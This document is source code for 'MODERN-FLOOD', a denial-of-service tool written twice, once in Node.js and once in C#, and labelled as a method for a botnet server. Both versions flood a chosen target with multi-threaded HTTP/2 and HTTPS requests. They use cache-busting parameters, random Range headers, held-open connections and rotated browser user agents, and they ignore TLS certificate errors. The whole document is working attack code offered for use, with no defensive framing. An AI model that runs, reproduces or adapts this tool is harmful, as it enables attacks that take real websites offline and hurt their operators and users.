File: methods/modern-flood.js
/**
 * MODERN-FLOOD - Advanced HTTP/2 & HTTP/3 Attack Method
 * Uses modern web vulnerabilities and techniques
 * Compatible with the botnet server
 * 
 * Usage: node modern-flood.js <target> <duration> <threads> <rate_limit>
 */

const http2 = require('http2');
const https = require('https');
const { URL } = require('url');
const crypto = require('crypto');
const cluster = require('cluster');
const os = require('os');

// Parse command line arguments
const args = process.argv.slice(2);
if (args.length < 2) {
    console.log('Usage: node modern-flood.js <target> <duration> [threads] [rate_limit]');
    process.exit(1);
}

const TARGET = args[0];
const DURATION = parseInt(args[1]) || 60;
const THREADS = parseInt(args[2]) || Math.min(os.cpus().length, 4);
const RATE_LIMIT = parseInt(args[3]) || 64;

// Attack configuration
const CONFIG = {
    target: TARGET,
    duration: DURATION,
    threads: THREADS,
    rateLimit: RATE_LIMIT,
    userAgents: [
        'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36',
        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36',
        'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36',
        'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0',
        'Mozilla/5.0 (iPhone; CPU iPhone OS 17_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0 Mobile/15E148 Safari/604.1'
    ],
    methods: ['GET', 'POST', 'HEAD', 'OPTIONS'],
    vulnerabilities: {
        slowloris: true,          // Keep connections open
        rangeAttack: true,         // Byte range requests
        cacheBypass: true,         // Cache poisoning
        http2Flood: true,          // HTTP/2 stream multiplexing
        compressionBomb: true      // Request large compressed responses
    }
};

// Parse target URL
let targetUrl;
try {
    targetUrl = new URL(CONFIG.target);
} catch (error) {
    console.error('[ERROR] Invalid target URL:', CONFIG.target);
    process.exit(1);
}

// Generate random string
function randomString(length = 16) {
    return crypto.randomBytes(length).toString('hex');
}

// Generate random user agent
function randomUserAgent() {
    return CONFIG.userAgents[Math.floor(Math.random() * CONFIG.userAgents.length)];
}

// Generate random HTTP method
function randomMethod() {
    return CONFIG.methods[Math.floor(Math.random() * CONFIG.methods.length)];
}

// Generate cache-busting query parameters
function generateCacheBuster() {
    return {
        _: Date.now(),
        rand: randomString(8),
        cb: crypto.randomBytes(4).toString('hex'),
        t: Math.random().toString(36).substring(7)
    };
}

// Build query string
function buildQueryString(params) {
    return Object.entries(params)
        .map(([key, value]) => `${key}=${value}`)
        .join('&');
}

// HTTP/2 Attack
function http2Attack() {
    const client = http2.connect(targetUrl.origin, {
        rejectUnauthorized: false
    });

    client.on('error', () => {
        client.close();
        setTimeout(() => http2Attack(), 100);
    });

    const attackInterval = setInterval(() => {
        for (let i = 0; i < CONFIG.rateLimit; i++) {
            const cacheBuster = generateCacheBuster();
            const path = `${targetUrl.pathname}?${buildQueryString(cacheBuster)}`;
            
            const headers = {
                ':method': randomMethod(),
                ':path': path,
                'user-agent': randomUserAgent(),
                'accept': '*/*',
                'accept-encoding': CONFIG.vulnerabilities.compressionBomb ? 'gzip, deflate, br, compress' : 'identity',
                'cache-control': CONFIG.vulnerabilities.cacheBypass ? 'no-cache, no-store, must-revalidate' : 'max-age=0',
                'pragma': 'no-cache',
                'connection': CONFIG.vulnerabilities.slowloris ? 'keep-alive' : 'close',
                'x-requested-with': 'XMLHttpRequest',
                'origin': targetUrl.origin,
                'referer': targetUrl.href
            };

            // Add range header for range attack
            if (CONFIG.vulnerabilities.rangeAttack && Math.random() > 0.5) {
                const rangeStart = Math.floor(Math.random() * 1000000);
                headers['range'] = `bytes=${rangeStart}-${rangeStart + Math.floor(Math.random() * 100000)}`;
            }

            const req = client.request(headers);
            
            req.on('error', () => {});
            req.end();

            // Keep connection open for slowloris
            if (!CONFIG.vulnerabilities.slowloris) {
                req.close();
            }
        }
    }, 1000);

    setTimeout(() => {
        clearInterval(attackInterval);
        client.close();
    }, CONFIG.duration * 1000);
}

// HTTPS/1.1 Fallback Attack
function httpsAttack() {
    const makeRequest = () => {
        const cacheBuster = generateCacheBuster();
        const path = `${targetUrl.pathname}?${buildQueryString(cacheBuster)}`;

        const options = {
            hostname: targetUrl.hostname,
            port: targetUrl.port || 443,
            path: path,
            method: randomMethod(),
            headers: {
                'User-Agent': randomUserAgent(),
                'Accept': '*/*',
                'Accept-Encoding': CONFIG.vulnerabilities.compressionBomb ? 'gzip, deflate, br' : 'identity',
                'Cache-Control': CONFIG.vulnerabilities.cacheBypass ? 'no-cache, no-store' : 'max-age=0',
                'Connection': CONFIG.vulnerabilities.slowloris ? 'keep-alive' : 'close',
                'X-Requested-With': 'XMLHttpRequest',
                'Referer': targetUrl.href
            },
            rejectUnauthorized: false
        };

        // Add range header
        if (CONFIG.vulnerabilities.rangeAttack && Math.random() > 0.5) {
            const rangeStart = Math.floor(Math.random() * 1000000);
            options.headers['Range'] = `bytes=${rangeStart}-${rangeStart + Math.floor(Math.random() * 100000)}`;
        }

        const req = https.request(options, (res) => {
            res.on('data', () => {});
            res.on('end', () => {});
        });

        req.on('error', () => {});
        req.end();
    };

    const attackInterval = setInterval(() => {
        for (let i = 0; i < CONFIG.rateLimit; i++) {
            makeRequest();
        }
    }, 1000);

    setTimeout(() => {
        clearInterval(attackInterval);
    }, CONFIG.duration * 1000);
}

// Master process
if (cluster.isMaster) {
    console.log('\n╔════════════════════════════════════════╗');
    console.log('║      MODERN-FLOOD ATTACK METHOD       ║');
    console.log('╚════════════════════════════════════════╝\n');
    console.log(`Target       : ${CONFIG.target}`);
    console.log(`Duration     : ${CONFIG.duration} seconds`);
    console.log(`Threads      : ${CONFIG.threads}`);
    console.log(`Rate/Thread  : ${CONFIG.rateLimit} req/s`);
    console.log(`Total Rate   : ~${CONFIG.threads * CONFIG.rateLimit} req/s`);
    console.log('\nVulnerabilities Exploited:');
    console.log(`  • HTTP/2 Flood         : ${CONFIG.vulnerabilities.http2Flood ? '✓' : '✗'}`);
    console.log(`  • Slowloris            : ${CONFIG.vulnerabilities.slowloris ? '✓' : '✗'}`);
    console.log(`  • Range Attack         : ${CONFIG.vulnerabilities.rangeAttack ? '✓' : '✗'}`);
    console.log(`  • Cache Bypass         : ${CONFIG.vulnerabilities.cacheBypass ? '✓' : '✗'}`);
    console.log(`  • Compression Bomb     : ${CONFIG.vulnerabilities.compressionBomb ? '✓' : '✗'}`);
    console.log('\n[INFO] Launching attack...\n');

    // Fork worker processes
    for (let i = 0; i < CONFIG.threads; i++) {
        const worker = cluster.fork();
        console.log(`[THREAD-${i + 1}] Started (PID: ${worker.process.pid})`);
    }

    // Auto-stop after duration
    setTimeout(() => {
        console.log('\n[INFO] Attack duration reached. Stopping all threads...');
        
        for (const id in cluster.workers) {
            cluster.workers[id].kill();
        }

        console.log('[COMPLETE] Attack finished successfully.\n');
        process.exit(0);
    }, CONFIG.duration * 1000 + 2000);

    cluster.on('exit', (worker, code, signal) => {
        console.log(`[THREAD] Worker ${worker.process.pid} exited`);
    });

} else {
    // Worker process
    try {
        // Try HTTP/2 first, fallback to HTTPS
        if (CONFIG.vulnerabilities.http2Flood && targetUrl.protocol === 'https:') {
            http2Attack();
        } else {
            httpsAttack();
        }
    } catch (error) {
        console.error(`[WORKER-${process.pid}] Error:`, error.message);
        httpsAttack(); // Fallback
    }
}

// Handle process termination
process.on('SIGTERM', () => {
    console.log('[INFO] Received SIGTERM, shutting down gracefully...');
    process.exit(0);
});

process.on('SIGINT', () => {
    console.log('\n[INFO] Received SIGINT, shutting down gracefully...');
    process.exit(0);
});

File: methods/modern-flood.cs
// ModernFlood.cs
// Compile: dotnet new console -n ModernFlood -f net8.0
// Replace Program.cs with this code, then `dotnet build -c Release`
// Usage: dotnet run -- <target> <duration> [threads] [rate_limit]

using System;
using System.Collections.Concurrent;
using System.Collections.Generic;
using System.Diagnostics;
using System.Linq;
using System.Net;
using System.Net.Http;
using System.Net.Http.Headers;
using System.Net.Security;
using System.Security.Cryptography;
using System.Text;
using System.Threading;
using System.Threading.Tasks;

class ModernFlood
{
    static readonly Random _rand = new Random();
    static string _target;
    static int _durationSec;
    static int _threads;
    static int _ratePerThread;

    // Attack features (all enabled by default)
    static readonly bool _slowloris = true;
    static readonly bool _rangeAttack = true;
    static readonly bool _cacheBypass = true;
    static readonly bool _http2Flood = true;
    static readonly bool _compressionBomb = true;

    static readonly string[] _userAgents = {
        "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36",
        "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36",
        "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36",
        "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0",
        "Mozilla/5.0 (iPhone; CPU iPhone OS 17_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0 Mobile/15E148 Safari/604.1"
    };

    static readonly string[] _methods = { "GET", "POST", "HEAD", "OPTIONS" };

    static async Task Main(string[] args)
    {
        if (args.Length < 2)
        {
            Console.WriteLine("Usage: ModernFlood <target> <duration> [threads] [rate_limit]");
            return;
        }

        _target = args[0];
        _durationSec = int.Parse(args[1]);
        _threads = args.Length > 2 ? int.Parse(args[2]) : Math.Min(Environment.ProcessorCount, 4);
        _ratePerThread = args.Length > 3 ? int.Parse(args[3]) : 64;

        if (!_target.StartsWith("http"))
            _target = "https://" + _target;

        Console.WriteLine("\n╔════════════════════════════════════════╗");
        Console.WriteLine("║      MODERN-FLOOD ATTACK METHOD       ║");
        Console.WriteLine("╚════════════════════════════════════════╝\n");
        Console.WriteLine($"Target       : {_target}");
        Console.WriteLine($"Duration     : {_durationSec} seconds");
        Console.WriteLine($"Threads      : {_threads}");
        Console.WriteLine($"Rate/Thread  : {_ratePerThread} req/s");
        Console.WriteLine($"Total Rate   : ~{_threads * _ratePerThread} req/s");
        Console.WriteLine("\nVulnerabilities Exploited:");
        Console.WriteLine($"  • HTTP/2 Flood         : {(_http2Flood ? "✓" : "✗")}");
        Console.WriteLine($"  • Slowloris            : {(_slowloris ? "✓" : "✗")}");
        Console.WriteLine($"  • Range Attack         : {(_rangeAttack ? "✓" : "✗")}");
        Console.WriteLine($"  • Cache Bypass         : {(_cacheBypass ? "✓" : "✗")}");
        Console.WriteLine($"  • Compression Bomb     : {(_compressionBomb ? "✓" : "✗")}");
        Console.WriteLine("\n[INFO] Launching attack...\n");

        var cts = new CancellationTokenSource();
        var tasks = new Task[_threads];
        var counters = new ConcurrentDictionary<int, long>();

        for (int i = 0; i < _threads; i++)
        {
            int id = i;
            counters[id] = 0;
            tasks[i] = Task.Run(() => Worker(id, cts.Token, counters));
        }

        // RPS monitor
        var monitor = Task.Run(async () =>
        {
            while (!cts.Token.IsCancellationRequested)
            {
                await Task.Delay(1000);
                foreach (var kv in counters)
                {
                    if (kv.Value > 0)
                        Console.WriteLine($"[THREAD-{kv.Key+1}] RPS: {kv.Value}");
                    counters[kv.Key] = 0;
                }
            }
        });

        await Task.Delay(_durationSec * 1000);
        cts.Cancel();
        await Task.WhenAll(tasks);
        await monitor;
        Console.WriteLine("\n[COMPLETE] Attack finished successfully.\n");
    }

    static async Task Worker(int id, CancellationToken ct, ConcurrentDictionary<int, long> counter)
    {
        var uri = new Uri(_target);
        bool useHttp2 = _http2Flood && uri.Scheme.Equals("https", StringComparison.OrdinalIgnoreCase);

        var handler = new SocketsHttpHandler
        {
            PooledConnectionLifetime = TimeSpan.FromSeconds(30),
            PooledConnectionIdleTimeout = TimeSpan.FromSeconds(10),
            MaxConnectionsPerServer = 1000,
            EnableMultipleHttp2Connections = useHttp2,
            SslOptions = new SslClientAuthenticationOptions
            {
                RemoteCertificateValidationCallback = (sender, cert, chain, errors) => true
            }
        };

        if (useHttp2)
            handler.DefaultVersionPolicy = HttpVersionPolicy.RequestVersionExact;

        using var client = new HttpClient(handler);
        // Keep connections alive for slowloris
        if (_slowloris)
            client.DefaultRequestHeaders.ConnectionClose = false;
        else
            client.DefaultRequestHeaders.ConnectionClose = true;

        // Base path & query handling
        string basePath = uri.PathAndQuery;
        if (string.IsNullOrEmpty(basePath)) basePath = "/";
        bool hasQuery = basePath.Contains('?');

        var sw = Stopwatch.StartNew();
        int intervalMs = 1000 / _ratePerThread;

        while (!ct.IsCancellationRequested && sw.Elapsed.TotalSeconds < _durationSec)
        {
            // Random method
            string method = _methods[_rand.Next(_methods.Length)];
            var request = new HttpRequestMessage(new HttpMethod(method), BuildRequestUri(uri, basePath, hasQuery));

            // Apply headers
            request.Headers.UserAgent.ParseAdd(RandomUserAgent());
            request.Headers.Add("Accept", "*/*");
            request.Headers.Add("Accept-Encoding", _compressionBomb ? "gzip, deflate, br, compress" : "identity");
            request.Headers.Add("Cache-Control", _cacheBypass ? "no-cache, no-store, must-revalidate" : "max-age=0");
            request.Headers.Add("Pragma", "no-cache");
            request.Headers.Add("X-Requested-With", "XMLHttpRequest");
            request.Headers.Add("Origin", uri.GetLeftPart(UriPartial.Authority));
            request.Headers.Add("Referer", _target);

            // Range attack
            if (_rangeAttack && _rand.NextDouble() > 0.5)
            {
                long rangeStart = _rand.Next(0, 1_000_000);
                long rangeEnd = rangeStart + _rand.Next(100, 100_000);
                request.Headers.Range = new RangeHeaderValue(rangeStart, rangeEnd);
            }

            try
            {
                using var response = await client.SendAsync(request, HttpCompletionOption.ResponseHeadersRead, ct);
                await response.Content.ReadAsStreamAsync(ct).ContinueWith(t => t.Result?.Dispose());
                counter.AddOrUpdate(id, 1, (_, old) => old + 1);
            }
            catch
            {
                // Ignore errors
            }

            await Task.Delay(intervalMs, ct);
        }
    }

    static string BuildRequestUri(Uri uri, string basePath, bool hasQuery)
    {
        // Cache‑busting parameters
        var cacheBuster = new Dictionary<string, string>
        {
            ["_"] = DateTimeOffset.UtcNow.ToUnixTimeMilliseconds().ToString(),
            ["rand"] = RandomString(8),
            ["cb"] = RandomHex(4),
            ["t"] = _rand.Next().ToString("x")
        };
        string query = string.Join("&", cacheBuster.Select(kv => $"{kv.Key}={kv.Value}"));
        string fullPath = basePath + (hasQuery ? "&" : "?") + query;
        return $"{uri.Scheme}://{uri.Host}{fullPath}";
    }

    static string RandomUserAgent() => _userAgents[_rand.Next(_userAgents.Length)];
    static string RandomString(int length) => Convert.ToHexString(RandomNumberGenerator.GetBytes(length)).ToLower();
    static string RandomHex(int length) => Convert.ToHexString(RandomNumberGenerator.GetBytes(length)).ToLower();
}
